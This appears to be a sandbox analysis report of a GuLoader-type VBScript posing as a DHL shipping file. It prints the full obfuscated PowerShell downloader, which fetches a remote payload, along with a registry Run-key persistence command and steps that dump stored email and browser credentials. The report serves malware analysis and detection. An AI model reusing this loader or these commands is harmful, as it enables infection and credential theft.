Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

AWBSHIPPIN...87.vbs

windows7-x64

10

AWBSHIPPIN...87.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/04/2024, 09:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AWBSHIPPING-DHL-46T6R9764987.vbs

  • Size

    42KB

  • MD5

    13c8293c8c161c3c2572a39f2591520a

  • SHA1

    a7c9097d4fc7911db572e1be818e1b9fd6ba9a13

  • SHA256

    014fa04a5028251ea8ed900339ff91f3a040914ef9ceb8b342d7da22aef09119

  • SHA512

    d8add90901ccbc9b62d2a2e5a21cc316475cab94a7ae2e7c900d81a6d7ba67db6d57861d184b847f4fec19065ef76ab6e937d6eec5235051b588ed344d007c95

  • SSDEEP

    768:y5jl4SycO0mAWbs1SDsqc59+yXs6r+aTpJZSpVXQ8hcc2gGxy7qk4aQ1DVkzP/R4:y5j+NcOZAWbs1SgR59lrBJSnX5QhxyzC

Score
10/10
guloadercollectiondownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AWBSHIPPING-DHL-46T6R9764987.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sanitetsvsenet = 1;$Pararek='S';$Pararek+='ubstrin';$Pararek+='g';Function Inventering($Klbemaskine){$Trafikminister=$Klbemaskine.Length-$Sanitetsvsenet;For($Gulix=6; $Gulix -lt $Trafikminister; $Gulix+=(7)){$Forsgsvist+=$Klbemaskine.$Pararek.Invoke( $Gulix, $Sanitetsvsenet);}$Forsgsvist;}function Tauranga($galliske){. ($Indlsningsmetodens) ($galliske);}$Doorman=Inventering ' Wri,kMIn ensoBak erzileus iImprudl ModsalChir,pa Shoot/Somewi5 Hjiso.Phonoc0graphi Geront(MindelWN,nchoiDainc.nGemmindHypergoOtos,fw Bermts No.lo ArgentN BegulT Nonac trepa1 .raic0Pa.ago.Plov,r0Roen g;.nflat StikfaWOverfliChuckfn Pecul6Unem,l4Trlban;kandi, Omfavnx Mistr6Trykke4.olida;Im,ede ElgkerBru.tovHandel:Urligu1Slankn2Aceolo1Avlsdy.Smerge0Knalle) ,xoti Rece,G IntereKoncencReallnk EchoioMis ir/ Ska n2 Rackm0.uperc1 C.pel0B,tter0Dampen1Send.e0Lissom1 ,achi Di givF AnsgtiFr gatrScorneeDisbowfRacemioHjemfaxSolbad/Effekt1Wallet2beskik1Xraybo.noncon0Humidn ';$Overstregende50=Inventering 'Exag.eUDatatrsBuffbaeIndpisrAfsmel-Hjt,alAMicrobg KamfeeRelistnTevarmt Neutr ';$Simsende=Inventering ' Redr,hSka,ehtPhilomtGenganpevocat: Spicu/versio/ aconi8 Spytn7Dec.lo. Panus1Ejendo2Preleg1Skrive.As,eon1,ntero0 genn,5Skistv.Hypod.1knav,s8Parren4Udkigv/Jetja.GTils,edAnt,denSldersi ComponPestergclavicsSupraco Ventep forkobKr.gsfeSpaitcvSoapiea Immutr.iocheiAsylrenM lticgsubmaisloveraa.ddrlanVersifl fo,tyg ,hirtgUdlaane PseudnB kerne,rning.SupervpRep,obfWelldobBrav r ';$Matzoh=Inventering 'ensoph>Infero ';$Indlsningsmetodens=Inventering 'disconi ,fgiveSpksfoxFatig ';$reallots='inby';Tauranga (Inventering ' skadeS ForureForbudtSe vis-XerodeCAfstsmoIndsnknStorsntRo.erneOverbonlute.vtaesthe sojaka-AflytnPE,rochaAnthrot He,vihGuldbr vrneplTDaiker: D isi\CraftiIunwatcnOxidertSaftfleIza ryrCo icisTabpo.tMandiga wondedGinglye milie. Arka tForbe,x,igtent Ildfa Unche-Stat sV UngusaBiavlplS alpruArnbereJhowzy Afleve$Non,ulrSa.dsfeBilbomaFortl,lOverstlTakvinoSymphytTowerss Angol;,ongel ');Tauranga (Inventering 'Vr.leriuau.orfKalibr Pi,bra(QuiltetonsetteFinanss .appetP,ttif-RgslrepMetasoaFo,svatBasilihlaical Over,rTNonpar:Milit \ hfsenIEnamornsandw.t.oxcomeKokkerrKafiz s P zzlt Liesea GreendPl,neteDisksp.SharkytHar,ypxOvercot Col.v)sistni{Cal.iseUnderfx mo.sfiKassattNonsyn} Distr; Avast ');$Formalism = Inventering 'SprngseWeekencBandolh Hulkeosk,vli Livsla%ChalotaSubadmpfilmkopdriverdTy.eaaaFakturt Rystea Overv%Halstr\NogaisDSensumvOutsinrChokkegMim.keagastrogfordjetPikemoiAlime gWeaseltAag.rk.ComplaALedeo,nLysehod.vsave Usnini&S pera&School ProteseInhibicSammenhForg aoBahurk Servan$ Sp,ni ';Tauranga (Inventering 'Shibbo$Reallng kuldelBlodspoBakt.rbTrodseaNagelfl Semiu: ,luricDitchhaTroctorTem,tibArbitro S.idenBermudaWizierrF,brikitry.hes MascamTagund=Lyngh ( Ins.rcGeologmri ualdUnre r Herre/Blgplac,exkur tokr$Qu.ridFAtlas.oTungemrShagr,m Hjkona Scle lPr,mali hapsosO.findmRhubar)Filt.r ');Tauranga (Inventering 'Unover$ Paasag nonvol eposoUnfas,b HvepsaSeponelFlyv k:Portc HSlyngeoDe,obivHystereansky,dunder,bRe nefaTegninaEjec,mrIntervnSilicie,liesdsSmir.s2Vinbje2Forcen4Resolu=Access$kramsfSFejlmuiRicciamMisstasPi.ecoeMusikun avled YukoneUnsupe.Re.elesPsilo pU.pantlPhotoii iavlet stfo(Unc.up$.roposMmonarcaSval.gt ,andlz ,ewdeoBrassahTaxich)Buk el ');$Simsende=$Hovedbaarnes224[0];Tauranga (Inventering ' Terbe$Atl.idgTestrilPorphyoInterabPauperaOptimilTripty:ObligeDA skueiMyrmecsDragtesStrmlie.ssocitfinalet UnfonlHalluceOllasamHedasheHeatm nStokast Sp,ro=LvskovNAnciene PedanwAflokk-LovemoOBenef,bDobbeljPr come L pencTofte t Cheri SylishS Ant ry Sperms,fkrimt Dat te ResedmRusk,e.HenninNVoltsieOksekdtKajsag.FejlfiW fusileUnvictb CinnaCUnderblSe,rifiTene reUnqualnSejlentUn.hif ');Tauranga (Inventering ' do.er$ enagDRangkli Lepids,dmefusMagnife AeldetPhytostSelskalMis ime Pod.imAttitueDyedednCircumtS.ryge.Ek posHDagblae Carpualle.dedProgreeEgep,rrAdeninsHut er[ timba$StatsrOSustinvSkraaneInsinurEftergs .electGrama.rSatirieTidsprg Bj rge,amaisnAls cedUnvulceReengr5kundgr0 su er] M,sfe=Syrnen$FolkemD Bo.bloIzaa.ooEnkeperFormidm ObseqaSvede.nUnplac ');$Skoleinspektrerne=Inventering 'ImpresDGaranti Arkans,nertis Dy deebiwee t C,ypttEntreplOddsideR bbinmBotry.eTopfignOutvo,tSkanke.EliminDinerudoGafl nwOestr nWheelilRtsstooDi ektaElectidFlkhamF ArnoliLaminelUnsw,aeTankvo(Athena$ ,avilSVekseliLimin m Servos huskeeRhopalnB.dervdSchi de Opliv,Acropo$ SnuptS Svb.seUndreak T,angsbrohovuEnogtya YondelCothyrpS.ormfaLedesprFag.intForldrn,repaneMahogarSakrise.agnavs ,orra)Autoc ';$Skoleinspektrerne=$carbonarism[1]+$Skoleinspektrerne;$Seksualpartneres=$carbonarism[0];Tauranga (Inventering 'S,ftfu$DrslgegM dopsl,raktoo.ibliobDiglotaLovelol rneri: rivebLSubtotaKonvermLyr.bibKursussWizardkPerispiToldasn,xperisDement=Koinci( Sago T .heepeZeroizsOdontot Und.r-S.istvPFoldniaLe anttSm evih ,ubbe Respon$NonvibST iviaeSammenk C.tolsNummeruTyndtca PanoclBur.nsp FaktuaUnmirrrSprngntBudmasnTank rehft.pir AntiseDiamagsSupp e) .octu ');while (!$Lambskins) {Tauranga (Inventering 'Paanae$ CatargSuffral G,ntlo IndicbSadocaaWedginl hornw:MarkovDSvederiBejaelcFetaoskpin,assDeckp,odimittnHustrussynerg=F.rmam$Snrelit.ocalirOverpiuPodzoleIssuel ') ;Tauranga $Skoleinspektrerne;Tauranga (Inventering 'NettooSOv,rsttdiplo,aFr mskr.algsvtSignif-Mo.itoSLanguil OpnoreAfklipeM gilopOverl Sop r4 Appar ');Tauranga (Inventering 'Distil$Bverlagnorthwl ,ilbuofogliebAntem aMicrobl Wowwo:BosiddL F,emsaSavannmprobabbNutidbsCauponkPetiteiDo shenA,ahcisskorpe=Dis.lf(Yalel,TDecaffeArabanssuperstexecut-ForespPOrthogaHelseftFoliich F ske Selsk$ Le nySWhiteneS jultkWayfarsApesiluRteblgaXiphydlmucu.ep LegalaLiddedrFascistunrifenRepubleHandspr NdrineSi.kscsR inen) Sagog ') ;Tauranga (Inventering 'Hellig$T rbidgskrammlKalkbrogarantbStentoaAfgiftlSalens:KrisetHA bdniiHillocpS edfapEskapau SkillsZiz ny= raesk$ Hen.igJacqualSodavao PreusbadmittaUnderslbr,ako:Checkuk S rafv VolumiCrustaeUnerosnPersevdSoveree Stenc+cosmos+Undual% Rista$ rmsprHChukkaoPugginv,shawsemafia.dTicklib pringaSu,staa CitrarSnickenV.nstreMilieusFel,se2Teacup2Murder4Afsved.ProgracTaxaflo Pin,eupressenPatie,tSoljen ') ;$Simsende=$Hovedbaarnes224[$Hippus];}Tauranga (Inventering 'Smreos$TyvstjgBagdellMiljv.oLedrebbMammeraSonebolLystba:AcrospBFlyvebiDiegivnDagregsEfterg Gybing=Fortro bidragGDragemeRetstitUdgift-AnlgsiCAl,bamoIdentin Opbl tB.nineesvine.n BarbetUng ms Austra$ExpatiS .olkeeMer hakCircumsM.tissuvic,coa C,nsol,elatopDyrkn.a PishorGomutitAr,hdinEmilyseTilsvirVi hele RamlesSpyts ');Tauranga (Inventering 'B vgel$ YukiagBidragl Labiao.rallybtilkalaPen,til herrs:milli SSade,mk,ftalmiG spisfRoseaft Tolvte Maveds unf.epMicrogoWheyfarTrimk,sTelete .endt=Therap Redn n[em.ersSMonum,yIndskrs Psycht,yrerneInterbmFallos.OmrediCMetaxyo LagrinJ rnbavstyr.dePseudorCigarrtAdultd]Bicorp:Stjgen:BlubbiFKurm grAestheoBag ipmvivarvBTanekaaGokketsGennemeLandlo6Typhoi4TrykfeS HjredtvarmblrSlogani Sunfin ternegJourna( Fdrel$PkgsinB Aquati Komm nQua,hes Spruk)dagsku ');Tauranga (Inventering 'Photop$Cass,mg ,aukelFnikeroVersewbAvlshiaAmer.clSmelte: HugtnWTomogrrBestseiVltepetfortroh P imryHanrej Forrid=Myoneu Gifte[IntercS Ophthy KaffesGennemtTarv,leMortimmTrustd. Tig rT,nsheaeCo fesxAf.okktS.ineb.ornithEAntresninterfctoxic,oUdspecd hartkiOttomanRehi,egAvou.y] Semun:F,aade:SugarsA,agmanSLuvespC MyxovIEringoIPrerev.FuldvgG Irrefe As,ert Po tsSaut.not deantrGe.epdiDbefonndimittg Br ch(Hausto$IngungSSmakkekC alouishort f,nderbtSienreeJor.fssFunktipP ograoLa rymrM,elfasChirke),hevre ');Tauranga (Inventering 'Mil,ia$NonintgDemodulElgtyroRistafbSansedaIndbril onpri:S,egesK NitriiJeoparkBillaraBranch2Han.sk6 .umec= D via$ S.rfeWGavotnrLdrepaiMutesttRes.crh erity Exsti.ExodoisAuramiuMonismbSeacocsClassltPterogrun,imiiPeasann Masclg Bakse(Omis i3Unsens2Matine5Stouti0Hvorn.3 T gne8lignos,gaskr 2 ,ynte8Counte3Tenori0Kom un1 Bndsl)Mutati ');Tauranga $Kika26;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4800
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dvrgagtigt.And && echo $"
        3⤵
          PID:4460
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanitetsvsenet = 1;$Pararek='S';$Pararek+='ubstrin';$Pararek+='g';Function Inventering($Klbemaskine){$Trafikminister=$Klbemaskine.Length-$Sanitetsvsenet;For($Gulix=6; $Gulix -lt $Trafikminister; $Gulix+=(7)){$Forsgsvist+=$Klbemaskine.$Pararek.Invoke( $Gulix, $Sanitetsvsenet);}$Forsgsvist;}function Tauranga($galliske){. ($Indlsningsmetodens) ($galliske);}$Doorman=Inventering ' Wri,kMIn ensoBak erzileus iImprudl ModsalChir,pa Shoot/Somewi5 Hjiso.Phonoc0graphi Geront(MindelWN,nchoiDainc.nGemmindHypergoOtos,fw Bermts No.lo ArgentN BegulT Nonac trepa1 .raic0Pa.ago.Plov,r0Roen g;.nflat StikfaWOverfliChuckfn Pecul6Unem,l4Trlban;kandi, Omfavnx Mistr6Trykke4.olida;Im,ede ElgkerBru.tovHandel:Urligu1Slankn2Aceolo1Avlsdy.Smerge0Knalle) ,xoti Rece,G IntereKoncencReallnk EchoioMis ir/ Ska n2 Rackm0.uperc1 C.pel0B,tter0Dampen1Send.e0Lissom1 ,achi Di givF AnsgtiFr gatrScorneeDisbowfRacemioHjemfaxSolbad/Effekt1Wallet2beskik1Xraybo.noncon0Humidn ';$Overstregende50=Inventering 'Exag.eUDatatrsBuffbaeIndpisrAfsmel-Hjt,alAMicrobg KamfeeRelistnTevarmt Neutr ';$Simsende=Inventering ' Redr,hSka,ehtPhilomtGenganpevocat: Spicu/versio/ aconi8 Spytn7Dec.lo. Panus1Ejendo2Preleg1Skrive.As,eon1,ntero0 genn,5Skistv.Hypod.1knav,s8Parren4Udkigv/Jetja.GTils,edAnt,denSldersi ComponPestergclavicsSupraco Ventep forkobKr.gsfeSpaitcvSoapiea Immutr.iocheiAsylrenM lticgsubmaisloveraa.ddrlanVersifl fo,tyg ,hirtgUdlaane PseudnB kerne,rning.SupervpRep,obfWelldobBrav r ';$Matzoh=Inventering 'ensoph>Infero ';$Indlsningsmetodens=Inventering 'disconi ,fgiveSpksfoxFatig ';$reallots='inby';Tauranga (Inventering ' skadeS ForureForbudtSe vis-XerodeCAfstsmoIndsnknStorsntRo.erneOverbonlute.vtaesthe sojaka-AflytnPE,rochaAnthrot He,vihGuldbr vrneplTDaiker: D isi\CraftiIunwatcnOxidertSaftfleIza ryrCo icisTabpo.tMandiga wondedGinglye milie. Arka tForbe,x,igtent Ildfa Unche-Stat sV UngusaBiavlplS alpruArnbereJhowzy Afleve$Non,ulrSa.dsfeBilbomaFortl,lOverstlTakvinoSymphytTowerss Angol;,ongel ');Tauranga (Inventering 'Vr.leriuau.orfKalibr Pi,bra(QuiltetonsetteFinanss .appetP,ttif-RgslrepMetasoaFo,svatBasilihlaical Over,rTNonpar:Milit \ hfsenIEnamornsandw.t.oxcomeKokkerrKafiz s P zzlt Liesea GreendPl,neteDisksp.SharkytHar,ypxOvercot Col.v)sistni{Cal.iseUnderfx mo.sfiKassattNonsyn} Distr; Avast ');$Formalism = Inventering 'SprngseWeekencBandolh Hulkeosk,vli Livsla%ChalotaSubadmpfilmkopdriverdTy.eaaaFakturt Rystea Overv%Halstr\NogaisDSensumvOutsinrChokkegMim.keagastrogfordjetPikemoiAlime gWeaseltAag.rk.ComplaALedeo,nLysehod.vsave Usnini&S pera&School ProteseInhibicSammenhForg aoBahurk Servan$ Sp,ni ';Tauranga (Inventering 'Shibbo$Reallng kuldelBlodspoBakt.rbTrodseaNagelfl Semiu: ,luricDitchhaTroctorTem,tibArbitro S.idenBermudaWizierrF,brikitry.hes MascamTagund=Lyngh ( Ins.rcGeologmri ualdUnre r Herre/Blgplac,exkur tokr$Qu.ridFAtlas.oTungemrShagr,m Hjkona Scle lPr,mali hapsosO.findmRhubar)Filt.r ');Tauranga (Inventering 'Unover$ Paasag nonvol eposoUnfas,b HvepsaSeponelFlyv k:Portc HSlyngeoDe,obivHystereansky,dunder,bRe nefaTegninaEjec,mrIntervnSilicie,liesdsSmir.s2Vinbje2Forcen4Resolu=Access$kramsfSFejlmuiRicciamMisstasPi.ecoeMusikun avled YukoneUnsupe.Re.elesPsilo pU.pantlPhotoii iavlet stfo(Unc.up$.roposMmonarcaSval.gt ,andlz ,ewdeoBrassahTaxich)Buk el ');$Simsende=$Hovedbaarnes224[0];Tauranga (Inventering ' Terbe$Atl.idgTestrilPorphyoInterabPauperaOptimilTripty:ObligeDA skueiMyrmecsDragtesStrmlie.ssocitfinalet UnfonlHalluceOllasamHedasheHeatm nStokast Sp,ro=LvskovNAnciene PedanwAflokk-LovemoOBenef,bDobbeljPr come L pencTofte t Cheri SylishS Ant ry Sperms,fkrimt Dat te ResedmRusk,e.HenninNVoltsieOksekdtKajsag.FejlfiW fusileUnvictb CinnaCUnderblSe,rifiTene reUnqualnSejlentUn.hif ');Tauranga (Inventering ' do.er$ enagDRangkli Lepids,dmefusMagnife AeldetPhytostSelskalMis ime Pod.imAttitueDyedednCircumtS.ryge.Ek posHDagblae Carpualle.dedProgreeEgep,rrAdeninsHut er[ timba$StatsrOSustinvSkraaneInsinurEftergs .electGrama.rSatirieTidsprg Bj rge,amaisnAls cedUnvulceReengr5kundgr0 su er] M,sfe=Syrnen$FolkemD Bo.bloIzaa.ooEnkeperFormidm ObseqaSvede.nUnplac ');$Skoleinspektrerne=Inventering 'ImpresDGaranti Arkans,nertis Dy deebiwee t C,ypttEntreplOddsideR bbinmBotry.eTopfignOutvo,tSkanke.EliminDinerudoGafl nwOestr nWheelilRtsstooDi ektaElectidFlkhamF ArnoliLaminelUnsw,aeTankvo(Athena$ ,avilSVekseliLimin m Servos huskeeRhopalnB.dervdSchi de Opliv,Acropo$ SnuptS Svb.seUndreak T,angsbrohovuEnogtya YondelCothyrpS.ormfaLedesprFag.intForldrn,repaneMahogarSakrise.agnavs ,orra)Autoc ';$Skoleinspektrerne=$carbonarism[1]+$Skoleinspektrerne;$Seksualpartneres=$carbonarism[0];Tauranga (Inventering 'S,ftfu$DrslgegM dopsl,raktoo.ibliobDiglotaLovelol rneri: rivebLSubtotaKonvermLyr.bibKursussWizardkPerispiToldasn,xperisDement=Koinci( Sago T .heepeZeroizsOdontot Und.r-S.istvPFoldniaLe anttSm evih ,ubbe Respon$NonvibST iviaeSammenk C.tolsNummeruTyndtca PanoclBur.nsp FaktuaUnmirrrSprngntBudmasnTank rehft.pir AntiseDiamagsSupp e) .octu ');while (!$Lambskins) {Tauranga (Inventering 'Paanae$ CatargSuffral G,ntlo IndicbSadocaaWedginl hornw:MarkovDSvederiBejaelcFetaoskpin,assDeckp,odimittnHustrussynerg=F.rmam$Snrelit.ocalirOverpiuPodzoleIssuel ') ;Tauranga $Skoleinspektrerne;Tauranga (Inventering 'NettooSOv,rsttdiplo,aFr mskr.algsvtSignif-Mo.itoSLanguil OpnoreAfklipeM gilopOverl Sop r4 Appar ');Tauranga (Inventering 'Distil$Bverlagnorthwl ,ilbuofogliebAntem aMicrobl Wowwo:BosiddL F,emsaSavannmprobabbNutidbsCauponkPetiteiDo shenA,ahcisskorpe=Dis.lf(Yalel,TDecaffeArabanssuperstexecut-ForespPOrthogaHelseftFoliich F ske Selsk$ Le nySWhiteneS jultkWayfarsApesiluRteblgaXiphydlmucu.ep LegalaLiddedrFascistunrifenRepubleHandspr NdrineSi.kscsR inen) Sagog ') ;Tauranga (Inventering 'Hellig$T rbidgskrammlKalkbrogarantbStentoaAfgiftlSalens:KrisetHA bdniiHillocpS edfapEskapau SkillsZiz ny= raesk$ Hen.igJacqualSodavao PreusbadmittaUnderslbr,ako:Checkuk S rafv VolumiCrustaeUnerosnPersevdSoveree Stenc+cosmos+Undual% Rista$ rmsprHChukkaoPugginv,shawsemafia.dTicklib pringaSu,staa CitrarSnickenV.nstreMilieusFel,se2Teacup2Murder4Afsved.ProgracTaxaflo Pin,eupressenPatie,tSoljen ') ;$Simsende=$Hovedbaarnes224[$Hippus];}Tauranga (Inventering 'Smreos$TyvstjgBagdellMiljv.oLedrebbMammeraSonebolLystba:AcrospBFlyvebiDiegivnDagregsEfterg Gybing=Fortro bidragGDragemeRetstitUdgift-AnlgsiCAl,bamoIdentin Opbl tB.nineesvine.n BarbetUng ms Austra$ExpatiS .olkeeMer hakCircumsM.tissuvic,coa C,nsol,elatopDyrkn.a PishorGomutitAr,hdinEmilyseTilsvirVi hele RamlesSpyts ');Tauranga (Inventering 'B vgel$ YukiagBidragl Labiao.rallybtilkalaPen,til herrs:milli SSade,mk,ftalmiG spisfRoseaft Tolvte Maveds unf.epMicrogoWheyfarTrimk,sTelete .endt=Therap Redn n[em.ersSMonum,yIndskrs Psycht,yrerneInterbmFallos.OmrediCMetaxyo LagrinJ rnbavstyr.dePseudorCigarrtAdultd]Bicorp:Stjgen:BlubbiFKurm grAestheoBag ipmvivarvBTanekaaGokketsGennemeLandlo6Typhoi4TrykfeS HjredtvarmblrSlogani Sunfin ternegJourna( Fdrel$PkgsinB Aquati Komm nQua,hes Spruk)dagsku ');Tauranga (Inventering 'Photop$Cass,mg ,aukelFnikeroVersewbAvlshiaAmer.clSmelte: HugtnWTomogrrBestseiVltepetfortroh P imryHanrej Forrid=Myoneu Gifte[IntercS Ophthy KaffesGennemtTarv,leMortimmTrustd. Tig rT,nsheaeCo fesxAf.okktS.ineb.ornithEAntresninterfctoxic,oUdspecd hartkiOttomanRehi,egAvou.y] Semun:F,aade:SugarsA,agmanSLuvespC MyxovIEringoIPrerev.FuldvgG Irrefe As,ert Po tsSaut.not deantrGe.epdiDbefonndimittg Br ch(Hausto$IngungSSmakkekC alouishort f,nderbtSienreeJor.fssFunktipP ograoLa rymrM,elfasChirke),hevre ');Tauranga (Inventering 'Mil,ia$NonintgDemodulElgtyroRistafbSansedaIndbril onpri:S,egesK NitriiJeoparkBillaraBranch2Han.sk6 .umec= D via$ S.rfeWGavotnrLdrepaiMutesttRes.crh erity Exsti.ExodoisAuramiuMonismbSeacocsClassltPterogrun,imiiPeasann Masclg Bakse(Omis i3Unsens2Matine5Stouti0Hvorn.3 T gne8lignos,gaskr 2 ,ynte8Counte3Tenori0Kom un1 Bndsl)Mutati ');Tauranga $Kika26;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1032
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dvrgagtigt.And && echo $"
            4⤵
              PID:4480
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1776
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bewonder" /t REG_EXPAND_SZ /d "%Emissionsforgelsers% -w 1 $Opklaret=(Get-ItemProperty -Path 'HKCU:\Victorianeres\').Hrecentralen;%Emissionsforgelsers% ($Opklaret)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2168
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bewonder" /t REG_EXPAND_SZ /d "%Emissionsforgelsers% -w 1 $Opklaret=(Get-ItemProperty -Path 'HKCU:\Victorianeres\').Hrecentralen;%Emissionsforgelsers% ($Opklaret)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2832
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\egqezmpvpbjdiuenhvtgxtt"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1920
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\oivxafzwdkbiljsrqfgaayffqh"
                5⤵
                • Accesses Microsoft Outlook accounts
                PID:2448
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rcihsxkqrstnvpovhqtbllaozoilyi"
                5⤵
                  PID:1712
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rcihsxkqrstnvpovhqtbllaozoilyi"
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2976

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n31ujwyp.vaz.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\egqezmpvpbjdiuenhvtgxtt
          Filesize

          4KB

          MD5

          788d7419b32411807cc6753cbbccecbe

          SHA1

          761b99a1e5bc168f525181d78cff3f6ed82daa14

          SHA256

          76150e857b36f1f070422d2ad4df17f87454466348e4bfc158b028977378140b

          SHA512

          3003f104b0b07870015ff4e9e0d254c2e537d4c68ef664a772d7018827b0ccbeb5481a2ce587b88e6ab1d71d6ce523a620c11c00c676857d5fd5ab949fa617b4

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Dvrgagtigt.And
          Filesize

          460KB

          MD5

          7dc212a0d75a61e830886261ff643133

          SHA1

          3cd39998df24510987f99b6ffbd87334ff229ab5

          SHA256

          8af47344b98fdae0b08df9afe15cb27847971ee697318e2c5fdcf37a102291e6

          SHA512

          b082b77b8645461594d5dd8fa1d48e2a879f747a41c9bbd93ba580971173fcc0970d44cb2b63f7c694ddd07c8360b2bfcb64de0dff712fcb643747242f589235

          Download Submit

        • memory/1032-41-0x0000000008AC0000-0x000000000C50E000-memory.dmp

          Filesize

          58.3MB

          Download

        • memory/1032-35-0x00000000078E0000-0x0000000007F5A000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/1032-20-0x0000000005200000-0x0000000005222000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1032-18-0x0000000000F00000-0x0000000000F36000-memory.dmp

          Filesize

          216KB

          Download

        • memory/1032-19-0x0000000005390000-0x00000000059B8000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/1032-39-0x0000000008510000-0x0000000008AB4000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/1032-22-0x0000000005A70000-0x0000000005AD6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/1032-21-0x00000000052A0000-0x0000000005306000-memory.dmp

          Filesize

          408KB

          Download

        • memory/1032-32-0x0000000005AE0000-0x0000000005E34000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/1032-33-0x00000000060A0000-0x00000000060BE000-memory.dmp

          Filesize

          120KB

          Download

        • memory/1032-34-0x00000000063E0000-0x000000000642C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/1032-38-0x0000000007260000-0x0000000007282000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1032-36-0x0000000006650000-0x000000000666A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/1032-37-0x0000000007350000-0x00000000073E6000-memory.dmp

          Filesize

          600KB

          Download

        • memory/1776-73-0x0000000021B00000-0x0000000021B19000-memory.dmp

          Filesize

          100KB

          Download

        • memory/1776-69-0x0000000021B00000-0x0000000021B19000-memory.dmp

          Filesize

          100KB

          Download

        • memory/1776-72-0x0000000021B00000-0x0000000021B19000-memory.dmp

          Filesize

          100KB

          Download

